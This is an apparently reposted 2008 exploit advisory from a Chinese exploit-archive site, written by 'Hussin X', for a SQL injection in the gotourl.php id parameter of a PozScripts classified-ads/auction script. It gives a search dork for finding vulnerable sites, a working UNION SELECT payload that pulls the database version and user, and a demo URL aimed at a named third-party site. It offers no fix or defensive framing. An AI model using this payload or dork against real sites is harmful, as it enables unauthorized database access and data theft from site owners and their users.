首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

PozScripts Classified Ads Script (gotourl.php id) SQL Injection Vuln


http://www.gipsky.com/
|___________________________________________________
|
| Classified Auctions (gotourl.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------- Hussin X ------------------
|
| Author: Hussin X
|
| Home : www.IQ-ty.CoM
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|
| script : http://www.pozscripts.com/index.php
|
| DorK : inurl:gotourl.php?id=
|___________________________________________________

Exploit:
________


www.[target].com/Script/gotourl.php?id=-30 union select concat(version(),user())--


Demo:
________

http://www.singwebs.com/auction_demo/gotourl.php?id=-30 union select concat(version(),user())--



________________( Greetz )_____________________
_____ ____ __ __ _ ____
|_ _| | _ \ \ \ / / / \ / ___|
| | | |_) | \ V / / _ \ | | _
| | | _ < | | / ___ \ | |_| |
|_| |_| \_\ |_| /_/ \_\ \____|
_______________________________________________

[2008-10-26]
<< MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin) Kasra CMS (index.php) Multiple SQL Injection Vulnerabilities >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8